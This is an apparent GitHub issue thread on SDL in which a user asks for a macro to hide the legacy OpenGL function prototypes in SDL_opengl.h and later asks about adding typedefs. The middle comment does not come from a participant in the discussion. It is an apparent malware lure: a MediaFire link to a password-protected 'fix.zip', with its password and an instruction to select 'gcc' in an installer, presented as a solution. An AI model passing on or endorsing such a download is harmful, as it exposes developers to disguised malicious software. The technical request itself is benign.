### ISSUE TITLE
Macro option to hide OpenGL <=1.3 function definitions in SDL_opengl.h?

### ISSUE THREAD

**Issue by Semphriss** [libsdl-org/SDL#10606]
I'm using OpenGL dynamically, and the function names clash with SDL's definitions in SDL_OpenGL.h. Currently, It's a mess to keep track of which functions are part of OpenGL up to 1.3, and have a special workaround for them, and even more so on platforms where the default linked version of OpenGL isn't OpenGL 1.3.

Would it be possible to have an optional macro option to not have those functions defined? Something like:
```patch
 #define GL_OPTION 0x1234
 ...
+#ifndef SDL_HIDE_FUNCTIONS
 GLAPI void GLAPIENTRY glClear( GLbitfield mask );
 GLAPI void GLAPIENTRY...
+#endif
 ...
```

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Semphriss** [comment]
I noticed that hiding the prototypes removes the function type information, as there is no `PFNGLFUNCNAMEPROC` for those functions. Is it fine if I add typedefs for those? (Probably guarded by the same macro, since they don't seem to be part of standard OpenGL)
